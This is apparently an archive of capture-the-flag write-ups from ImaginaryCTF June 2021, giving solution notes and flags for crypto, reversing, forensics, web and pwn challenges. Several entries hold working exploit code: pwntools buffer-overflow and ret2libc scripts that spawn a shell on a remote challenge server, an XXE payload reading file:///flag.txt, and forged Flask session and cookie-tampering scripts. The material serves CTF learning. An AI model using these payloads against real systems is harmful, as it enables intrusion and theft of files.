Archived Challenges - June 2021

Send the visual antenna into the transistor, it will back up the capacitor by backing up its SSL card!

ictf{Round_11_Sanity_Check}

As the flag says, just search for the flag format or even simply ictf to find the flag in the output.

ictf{gr3p_0r_4ny_t3xt_3d1t0r...Fl4g_f0rm4t_m4tt3rs}

Rot1

ictf{my_gift_to_you_is_this_:_an_easy_chall}

When we visit the / url, we are redirected to /0. Some quick experiments show us that /<int> always shows us a response of Hello, <int>, and everything else is a 404. Further investigation shows an X-Flag header on the responses, of a single letter. Collecting all letters (the ints are the indices) gives us the flag.

ictf{f0ll0w_th3_numb3rs}

know there's a redirect because of the changing URL (tried to make it as inconspicuous as possible, but it's noticeable), try to analyze the URL with cURL, see method not allowed, go the button in HTML and see that it's a form that's POSTing, add -X POST, profit :rooCash~1:

ictf{f1ag_1n_th3_c0mm3nts!}

from pwn import *
from ctypes import CDLL, c_int

exe = ELF('./predict', checksec=False)
libc = CDLL('libc.so.6')

p = process(exe.path)
# p = remote('20.94.210.205', 1337)

constants = [libc.rand() for i in range(4)]

p.recvuntil('flag: \n')

seed = libc.time(0) // 10
libc.srand(seed)

for i in range(4):
	random = libc.rand()
	constants[i] = c_int(constants[i] * (random % 1000))

constants = [i.value for i in constants]

guess = c_int(sum(constants)).value

p.sendline(str(guess))
print(p.recv())

ictf{exp3r1menting_w1th_ch@lleng3_f0rmat$_f0r_$c1ence}

There's a function zzzAVerySecretMessage in the code that prints the flag 1 character at a time - all you have to do is open the binary with your favorite decompiler, or just jump to the function in gdb. If the binary is executed, it deletes itself and replaces itself with a 194 byte binary that prints "This message has self destructed." and the original file will have to be redownloaded.

ictf{n3v3r_run_@_bin@ry_y0u_d0nt_+ru5t!}

This time, it's a windows binary. There's a lot of functions in the binary, and most of them are unnecessary. The tricky part in this challenge is to find the proper main function. The easiest ways I can think of are either:

• Look at the strings (or run it and search for the string you see) and find the crossreferences to "Hello"
• Run it in a debugger (needs windows, so I didn't actually do that)

From there, we see a check on argc that will not be satisfied and the flag is printed character per character. We can extract those characters and get the flag.

ictf{s1lly_0ld_bear}

The binary xors the input against the bytes of the checkFlag function (so, in a sense, the checkFlag function is both the lock and the key), and checks this against an array. You can use your favorite disassembler to grab these bytes, and perform the xor to get the flag.

ictf{wh@t_g00d_i5_@_10ck_!f_th3_l0ck_!s_th3_k3y?}

Decompiling the binary with ghidra will show that you have to enter "Go Fish!" and "Do you have any flags?" to get to the series of prints that prints the flag. Also, grepping strings for ictf and looking at the memory around there will show several pieces of the flag that can be assembled. Finally, decompiling and running the string scripts found here (https://cujo.com/reverse-engineering-go-binaries-with-ghidra/) will show the strings get printed that make up the flag.

ictf{g0_g0_g@dg3t_g3t_m3333_a11_th3_f1@gzz!}

The binary splits the flag into chunks of 4 characters, adds 0x1337c0de to each chunk, and xors it with a value in an array. If that matches the next chunk, the first chunk is valid. You can either set up a system of equations from this, and have z3 or the like solve it, or know that the first chunk is "ictf", and generate the rest of the chunks accordingly.

ictf{!_@m_wh@t_!_@m_@nd_+h@ts_@11_+h@t_!_@m}

There's three parts to this reversing. First, the length check in the initial read loop. This ensures that passwords are at least 16 characters long. Second, the passwords are compared to each other to make sure that they aren't repeated. Finally, there's the validate function. This is a recursive function that checks to see if the input is a palindrome of even length, without consecutive characters (e.g. "aabbaa" is invalid, but "abaaba" is valid). Thus, simply entering 3 such palindromes will yield the flag.

ictf{@n_ICICLE_r3v3rs3d_r3ma!ns_th3_s@m3}

Send 1000 null bytes to the server to bof and segfault it.

from pwn import *

p = remote("oreos.imaginaryctf.org", 30000)

print(p.recvline())
print(p.recvline())
print(p.recvline())
p.sendline(p8(0) * 1000)
print(p.recvall())

ictf{b0f?ju5+_@dd_m0r3_buff3r}

The key is only a single byte, so we can either

• bruteforce the key and either:
  • undo the addition logic
  • break it with z3
• Take the pieces that don't depend on the key, which is by far the largest part of the output, undo the logic on that, and infer ("guess") the rest of the flag
• Or do the previous option while inferring the value of the key from the known flag format

Script that takes the last approach with z3 to undo the "encryption":

import z3

with open("output.txt") as f:
    output = bytes.fromhex(f.read())

def attempt(key):
    s = z3.Solver()
    flag = [z3.BitVec(f"f_{i}", 8) for i in range(len(output) + 1)]
    orig = flag[:]
    x = [flag.pop(0)]
    while flag:
        y = flag[:len(x)]
        flag = flag[len(x):]
        x += ([(a + b) for a, b in zip(x, y)])

    for a, b in zip(x, bytes([key]) + output):
        s.add(a == b)

    s.check()
    if b"ictf" in (r := bytes([s.model()[f].as_long() for f in orig])[1:]):
        return r.decode()

print(attempt((output[0] - ord("i"))%256))

ictf{4dd1ng_4nd_casc4d1ng_and_adding_4nd_c4scad1ng}

While Timmy won't decrypt the flag, you can ask him to decrypt (2**e)*c % n, which will yield 2*m when decrypted.

ictf{y0u_m@d3_+!mmy_cry_y0u_3v!1_h@ck3r}

The Script will never shift the letter to what it was originally, so you have to look at what letter never appeared in any index.

bytes(list(set(range(ord("A"), ord("Z") + 1)) - set(x))[0] if len(set(x)) != 1 else x[0] for x in np.array(list(map(list, read("output.txt").strip().split()))).T)

ICTF{THE_MISSING_MYSTERY}

Use point doubling equations to retrieve the curve parameters, then use some maths to compute its order

xp, yp = 13721191374366420180377253776387076000480246815852205697410286316623904707509, 15546216794218269665387064067426591325783663330332949666584538995755179084261
xq, yq =  7759521132309061296716250650979510027373452958739669671394739010159270474311, 14302246045604117731126501528071886365994126908953754994206730761987730092254
flag = int(1908238427445950804337450504869547077117085157723645071010868264470221173655056956)

# First, we want to retrieve the curve parameters.
# When you have equations modulo an unknown, try to find that unknown first and foremost.
#   (Usually you would find multiples of it and do gcd, but we don't have such luxury here)

# Point Doubling Equations
# λ := (3xp² + a)/(2yp) mod p^k
# xq = λ² - 2xp mod p^k
# yq = λ(xp - xq) - yp mod p^k

# p^k | (yq + yp)² - (xq + 2xp)(xp - xq)²
multiple = (xq + 2*xp)*(xp - xq)^2 - (yq + yp)^2
print(multiple)

# Send multiple to factordb, 12654803915193133223 has power 3 and is 64 bits long => we have found p
p = 12654803915193133223
k = 4

# Compute curve parameters with the same equations
λ = Zmod(p^k)(yq + yp)/(xp - xq)
a = λ*2*yp - 3*xp^2
b = yp^2 - xp^3 - a*xp

# Now you can use mathemagics to prove that |E(Z/p^kZ)| = |E(Z/pZ)| * p^(k-1), or just try with random curves and small primes in order to seek a pattern
E = EllipticCurve([a, b])
o = (E/GF(p)).order() * p^(k-1)

# Just invert the xor
flag = (flag ^^ o^3) & (2^(flag.bit_length() + 1) - 1)
flag = int(flag)
print(flag.to_bytes(1 + flag.bit_length()//8, 'big'))

ictf{HaHa_m@7h3mag1c5_g0_brrrrrrr}

We have an instance of DSA where the nonce is generated in a small subgroup mod q, since it is generated as a power of g mod q and $g^{10794} \equiv 1 \pmod q$. This means we can bruteforce the nonce to recover the private key.

Assume we know (or guess/bruteforce) the nonce k, then we know that: $$ r = (g^{k \mod p) \mod q $$ and $$ s = k}{-1} \cdot (H(m) + x\cdot r) \mod q. $$ We can then validate if our guess/choice for k is correct by validating the value of r. And knowing k, r, s and m, it's only a matter of applying some modular arithmetic mod q to obtain $$ x = (k \cdot s - H(m)) * r^{-1} \pmod q $$

and that gives us the flag.

ictf{unsafe_nonces_strike_again}

The Word document may be opened and read through a personal copy of Word or through the free version online. As the format itself is Open Office XML, it will also open in Google Docs or most other word processors. The contents are from Wikipedia and discuss how Office files are actually ZIP files that contain XML and other data. Unzip the file directly or change the extension to ".zip" and open it through file associations. Inside the Document folder structure is a "Word" directory and flag.txt will be there.

ictf{4ll_0ff1c3_F1l3s_4r3_Z1p5}

You need 4 shares out of 5 total to recover the secret: one is in LSB, other is in Metadata, another is in the image itself, one is appended to file and the last one can be found at the place redirected by URL (visible only when you modify the IHDR chunk to increase image height). A simple version of SSS is used, without using finite field arithmetic. Hence, Lagrange interpolation can be used to reconstruct the polynomial. The python code provided on wikipedia article seems to work too. The long_to_bytes from pycryptodome or unhexlify from binascii can be used to convert the number to string.

ictf{gh1dr@h}

The provided file is a Firefox profile. Looking at the history, you can see that the user visited an "inconspicuous" pastebin, which is password protected. There is a single saved login in the logins.json for pastebin. This can be cracked by copying and pasting the logins.json and key4.db files into an existing Firefox profile and visiting about:logins, or by using one of a number of tools available on the internet. Putting this password into the pastebin yields the flag.

ictf{th3_f0x_0f_f1r3_s33s_a11}

The first step is viewing the PNG file in any tool that will allow you to see the Text Chunks that have been added to it. A separate tool like TweakPNG, an online tool like "https://products.groupdocs.app/metadata/png", or a handrolled Python Pillow or Powershell script can all extract the metadata chunks. There is a tEXt chunk that contains "Do you believe in magic?" and a zTXt chunk, compressed, that contains a "Raw64" key with a base64 Encoded String.

Cursory inspection of the viewable data can also lead to two more clues. The image itself is a transistor circuit for an XOR gate and the image has a light watermark that says "7 Bytes". The watermark is easy to expose in Photoshop, https://photopea.com, or most steganography packages.

The decoded Raw64 stream looks like a complete mess, but the clue for "magic" is still unused. A few different approaches can lead to breaking through to the next step. "strings" will show multiple hits of "ID3II*". A frequency analysis will show a high number of hits on "I", "D", and "". A visual inspection can show "ID3II\0" repeating many times. A Cyberchef or Python scan for common magic bytes will return multiple hits for TIFF and MP3. If none of those are familiar for a user, a look at https://en.wikipedia.org/wiki/List_of_file_signatures can lead to the same information. TIFF is "II*\0" and MP3 is "ID3". Both possibilities can be tried and when XORed with TIFF+MP3 magic bytes as a 7 byte key, the "JFIF" magic bytes immediately show at the beginning of the string.

From here, the file can be trivially viewed to show the flag. It is possible a quick glance may not notice the exclamation point at the end, but a fast double-check should catch it.

The full Cyberchef recipe to show the flag from the Base64 is: From_Base64('A-Za-z0-9+/=',true) XOR({'option':'Hex','string':'49492A00494433'},'Standard',false) Render_Image('Raw')

ictf{m4gic_byt3s_F7W!}

We get two RSA moduli, but consisting of 3 primes each. From the given source, we know that they share exactly 1 prime factor. We are however unable to factor either of the remaining products of 2 primes. The key observation is that the flag is likely to be small enough. i.e. it's smaller than the one prime factor $p$ that we know. As such, we can simply take the $e$th root mod $p$ (by taking $phi(p) = p - 1$), and actually find the flag.

ictf{sometimes_a_prime_is_all_you_really_need}

Redefine the exit function to do anything but exit, as with exit = lambda a: print(a), then spawn a shell or print the flag file.

ictf{i11_t@x_th3_stre3t_t@x_y0ur_s3@t_t@x_th3_he@t_+ax_y0ur_f33t}

from pwn import *

exe = ELF('./pwn_12c', checksec=False)
p = process(exe.path)
rop = ROP(exe)

rop.call(exe.symbols['win'], [0xDEADBEEF, 0xBA5EBA11, 0x1337C0DE])
payload = b'A'*52 + rop.chain()

p.sendlineafter('\n', payload)
print(p.recv())

OR

from pwn import *

exe = ELF('./pwn_12c', checksec=False)
p = process(exe.path)

payload = b'A'*52
payload += p32(exe.symbols['win'])
payload += p32(0)
payload += p32(0xDEADBEEF)
payload += p32(0xBA5EBA11)
payload += p32(0x1337C0DE)

p.sendlineafter('\n', payload)
print(p.recv())

ictf{y0ur_ord3r_of_3_@rgs_15_c0ming_r1ght_up}

from pwn import *

exe = ELF('./pwn_12c', checksec=False)
libc = ELF('./libc.so.6', checksec=False)

# p = process(exe.path)
p = remote('20.94.210.205', 1338)

############### libc leak #############
# payload = b'A'*52
# payload += p32(exe.symbols['puts'])
# payload += p32(exe.symbols['puts'])
# payload += p32(exe.got['puts'])
# payload += p32(exe.got['gets'])

# p.sendlineafter('!\n', payload)
# puts_leak = hex(u32(p.recvline()[:4]))
# gets_leak = hex(u32(p.recvline()[:4]))
# log.info(puts_leak)
# log.info(gets_leak)
#######################################

puts_rel = libc.symbols['puts']
system_rel = libc.symbols['system']
bin_sh_rel = next(libc.search(b'/bin/sh'))

payload = b'A'*52
payload += p32(exe.symbols['puts'])
payload += p32(exe.symbols['run'])
payload += p32(exe.got['puts'])

p.sendlineafter('!\n', payload)
puts = u32(p.recvline()[:4])
base = puts - puts_rel

payload = b'A'*52
payload += p32(base + system_rel)
payload += p32(0)
payload += p32(base + bin_sh_rel)

# gdb.attach(p, gdbscript='i f')
p.sendline(payload)
p.interactive()

ictf{yay!_y0u_c@n_pwn_32b1t_bin@r13$}

There are (at least) two vulnerabilities in the provided ICICLE program: unpack can write an arbitrary length string to the stack, overwriting the stored return address, and encrypt and repack have an off-by-one out-of-bounds read/write. The first vulnerability will allow us to perform a ret2win to the flag function, once we can bypass the stack canary. The second vulnerability allows us to read off the stack canary when our input string has the right length. Instead of using the second vulnerability, it is also possible to exhaustively test all canary bytes, as they're guaranteed to be the same over all runs. One more thing to be careful about is that unpack process the string from least significant byte to most significant, so the padding should be on the right side of the payload.

ictf{an_1C3_c0ld_buff3r_0v3rfl0w}

Straightforward XXE, we can just read the file with an entity <!ENTITY x SYSTEM "file:///flag.txt">. Take care that the document satisfies the DTD you specify.

This gives as an example full payload:

<!DOCTYPE pwn [
    <!ELEMENT pwn ANY>
    <!ENTITY pwn SYSTEM "file:///flag.txt">
]>
<pwn>&pwn;</pwn>

ictf{ext3rn4l_3nt1ties_n1c3ly_f0rm4tt3d}

Running Strings on the PNG file or looking at it in a Hex Editor will show that the Chunk Names and Magic Bytes are still in the file. A closer inspection will reveal that all the chunks are reporting their length as "0". If a player is not familiar with PNGs, looking at the end of the file or running strings will point them to the official documentation on the structure of the chunks in a PNG image. A small program can be written that will look for the known headers seen in the file and recompute how long the lengths should be. If the image is fixed, it will indicate that the answer should be looked for in the lengths themselves. Either writing the lengths or running strings on a fixed image will reveal the flag.

KNOWN_HEADERS = [b'IHDR', b'IDAT', b'IEND', b'sRGB', b'pHYs', b'tEXt']

with open("How Long Is It.png", "r+b") as png:
    content = png.read()
    assert content[:8] == b'\x89PNG\x0d\x0a\x1a\x0a'

    lengths = b''
    chunks = [i for i in range(len(content) - 4) if content[i:i+4] in KNOWN_HEADERS]
    for i in range(len(chunks) - 1):
        lengths += int.to_bytes(chunks[i + 1] - chunks[i] - 12, 4, 'big')
    print(lengths.decode('latin1'))

ictf{R3m3mb3r__Th3r3_1s_N0_L3ngth}

Have a look at ex.py. There are 5 general ideas on how to solve this.

import requests
from time import time
from os import system
from base64 import b64decode

from solver import solve
from server import get_primes_between
from client import get_new_maze, send_steps
from maze import Maze, WALL, CLEAR, PLAYER, FLAG

from flask_session_cookie_manager3 import encode


API = "http://127.0.0.1:9001"



################################################
# implement dijkstras algorithm (or smt similar)
print("---------------------------------------")
print("[*] With dijkstra:")

s = requests.Session()
maze = get_new_maze(s)

directions = solve(maze)
print(send_steps(s, directions))



#########################################################
# with the known secret key of flask, create an easy maze
print("\n\n---------------------------------------")
print("[*] Own maze:")

raw_maze = 4*WALL + "\n" + WALL + PLAYER + FLAG + WALL + "\n" + 4*WALL + "\n"
maze = Maze(data=raw_maze) # the outer walls are just for looks
print(maze)

secret = 'ictf[I_4m_sur3_y0u_c4nt_cr3at3_a_new_5e551on_to_1nst4ntly_s0lv3_th15_ch47!]'
data = f'{{"maze":"{maze.ascii_render()}","tries":0}}'
encoded = encode(secret, data)
cookies = {'session': encoded}
print("Created cookie: " + str(cookies))

res = requests.get(f'{API}/step?directions=d', cookies=cookies).text
print("\n" + res)


##########################################
# find the solve script in the maze source
print("\n\n---------------------------------------")
print("[*] Solver from Source:")

source = b64decode("CiMgc2VhcmNoIGNsb3Nlc3QgcGF0aCB0byBmbGFnCmRlZiBzb2x2ZShtYXplKToKICAgICMgcmVzZXQgYWxsZSBub2RlIGRpc3RhbmNlcyBhbmQgcHJldiBub2RlcwogICAgbWF6ZS5yZXNldF9zb2x2ZSgpCgogICAgIyBpbml0CiAgICBzdGFydF9ub2RlID0gbWF6ZS5nZXRfcGxheWVyX25vZGUoKQogICAgc3RhcnRfbm9kZS5zZXRfZGlzdCgwKQogICAgdGFyZ2V0ID0gbWF6ZS5nZXRfZmxhZ19ub2RlKCkKCiAgICB2aXNpdGVkID0gW10KICAgIG5leHRfbm9kZXMgPSBbc3RhcnRfbm9kZV0KCiAgICB3aGlsZSB0YXJnZXQgbm90IGluIHZpc2l0ZWQ6CiAgICAgICAgIyBjdXJyZW50IG5vZGUgaXMgYWx3YXlzIHRoZSBvbmUgd2l0aCB0aGUgc2hvcnRlc3QgZGlzdCB0byBzdGFydAogICAgICAgIGN1cnJlbnRfbm9kZSA9IG5leHRfbm9kZXMucG9wKDApCgogICAgICAgIG5laWdoYm91cnMgPSBtYXplLmdldF9hY3Rpb25zKG9ubHlfZGlyZWN0aW9ucz1GYWxzZSwgcG9zPWN1cnJlbnRfbm9kZS5nZXRfcG9zKCkpCiAgICAgICAgZm9yIGRpcmVjdGlvbiwgbmVpZ2hib3VyIGluIG5laWdoYm91cnM6CgogICAgICAgICAgICAjIGNoZWNrIGlmIHRoZSBuZXcgd2F5IGlzIHNob3J0ZXIKICAgICAgICAgICAgbmV3X2Rpc3QgPSBjdXJyZW50X25vZGUuZ2V0X2Rpc3QoKSArIDEKCiAgICAgICAgICAgIGlmIG5ld19kaXN0IDwgbmVpZ2hib3VyLmdldF9kaXN0KCk6CiAgICAgICAgICAgICAgICBuZWlnaGJvdXIuc2V0X2Rpc3QobmV3X2Rpc3QpCiAgICAgICAgICAgICAgICBuZWlnaGJvdXIuc2V0X3ByZXYoZGlyZWN0aW9uLCBjdXJyZW50X25vZGUpCiAgICAgICAgICAgICAgICBuZXh0X25vZGVzLmFwcGVuZChuZWlnaGJvdXIpCgogICAgICAgIGlmIGN1cnJlbnRfbm9kZSA9PSB0YXJnZXQ6CiAgICAgICAgICAgIHByaW50KCkKCiAgICAgICAgdmlzaXRlZC5hcHBlbmQoY3VycmVudF9ub2RlKSAgIyBub3cgYWxsIG5laWdoYm91cnMgYXJlIHZpc2l0ZWQsIG5vIG1vcmUgY2hhbmdlcyB0byBjdXJyZW50IG5vZGUKICAgICAgICBuZXh0X25vZGVzID0gc29ydGVkKG5leHRfbm9kZXMsIGtleT1sYW1iZGEgbjogbi5nZXRfZGlzdCgpKQoKICAgICMgYmFja3RyYWNrIGRpcmVjdGlvbnMKICAgIHdheSA9ICIiCiAgICBub2RlID0gbWF6ZS5nZXRfZmxhZ19ub2RlKCkKICAgIHdoaWxlIG5vZGUgaXMgbm90IHN0YXJ0X25vZGU6CiAgICAgICAgZCwgbm9kZSA9IG5vZGUuZ2V0X3ByZXYoKQogICAgICAgIHdheSArPSBkCgogICAgcmV0dXJuIHdheVs6Oi0xXQoKCmlmIF9fbmFtZV9fID09ICJfX21haW5fXyI6CiAgICBmcm9tIG1hemUgaW1wb3J0IE1hemUKCiAgICBtID0gTWF6ZSh2ZXJib3NlPUZhbHNlKQogICAgZGlyZWN0aW9ucyA9IHNvbHZlKG0pCgogICAgbS5zaG93X3NvbHZlKGRpcmVjdGlvbnMpCiAgICBwcmludChkaXJlY3Rpb25zKQ==")
source = source.decode()
open("leaked_solver.py", "w").write(source)
print("Decoded source, safed in leaked_solver.py")

from leaked_solver import solve as leaked_solve

s = requests.Session()
maze = get_new_maze(s)

directions = leaked_solve(maze)
print(send_steps(s, directions))

system("rm leaked_solver.py")


# --------------------------------------------------------------------- #
# this is used later
def decrypt_flag(encryped):
	cipher = encryped[1:-1].split(", ")
	cipher = [int(c) for c in cipher]
	print("Got encripted flag: " + str(cipher[:2])[:-2] + ", ...]")


	# (flag_enc[-1] + ord(FLAG[i])) * p1 * p2 = cipher[1]
	# (0x1337 + ord("i")) * p1 * p2 = cipher[1]
	# p1*p2 = cipher[1] // (0x1337 + ord("i"))

	n = int(cipher[1]) // (0x1337 + ord("i"))
	print("Got p1*p2: " + str(n))

	# (cipher[-1] + ord(FLAG[i])) * n = cipher[i]
	# ord(FLAG[i]) = cipher[i] // n - cipher[-1] 

	flag = ""
	for i in range(1, len(cipher)):
		flag += chr(cipher[i] // n - cipher[i-1])

	return flag
# --------------------------------------------------------------------- #


#########################################################
# get the server to throw an error, then decrypt flag_enc
print("\n\n---------------------------------------")
print("[*] Throw error:")

s = requests.Session()
get_new_maze(s)
flag_encryped = send_steps(s, "waw").split(": ")[-1][:-1]

print("\n" + decrypt_flag(flag_encryped))



##################################################
# solve the maze "manually", then decrypt flag_enc
print("\n\n---------------------------------------")
print("[*] Manual solve:")

# create a mock maze
raw_maze = 5*WALL + "\n" + WALL + PLAYER + CLEAR + FLAG + WALL + "\n" + 5*WALL + "\n"
maze = Maze(data=raw_maze) # the outer walls are just for looks
print(maze)

secret = 'ictf[I_4m_sur3_y0u_c4nt_cr3at3_a_new_5e551on_to_1nst4ntly_s0lv3_th15_ch47!]'
data = f'{{"maze":"{maze.ascii_render()}","tries":0}}'
encoded = encode(secret, data)
cookies = {'session': encoded}

s = requests.Session()
res = s.get(f'{API}/step?directions=d', cookies=cookies).text
maze.step("d") # only for demonstration purposes, the maze in the session is already updated
print(maze)

res = s.get(f'{API}/step?directions=d', cookies=cookies).text
maze.step("d") # only for demonstration purposes, the maze in the session is already updated
print(maze)

msg, flag_encryped, _ = res.split("\n")
print("Second step: " + msg)
print("\n" + decrypt_flag(flag_encryped))


print()```

ictf{W0w!_th3re_4r3_s0_m4ny_w4y5_t0_g37_the_fl4g,_r1ght?}

First find the secret urls in robots.txt, then

import requests
from hashlib import sha256

BASE_URL = "https://bakery.031337.xyz/"

# retrieve the hash of the baker's discount code
r = requests.get(f"{BASE_URL}secret_menu.html")
baker_hash = r.text.split("Menu Item Code: ")[1].split("</p>")[0]

# "unhash" the baker's hash by comparing it to every hash of the list of all discount codes
r = requests.get(f"{BASE_URL}topsecret/alldiscountcodes.txt")
all_codes = r.text.split("\n")[2:]
for code in all_codes:
    hash = sha256(code.encode("utf-8")).hexdigest()
    if hash == baker_hash:
        break
else:
    assert False

# only the baker gets an 80% discount off all cookies
cookies = {"customer_type": "baker"}
data = {"discount_code": code}

# send cookies in a post request with form data
r = requests.post(BASE_URL, data=data, cookies=cookies)
flag = r.text.split("<code>")[1].split("</code>")[0]
print(f"flag: {flag}")

ictf{y@y_n0w_1_c@N_3a+_mY_d3l1ciOU$_C0okIe5!!!}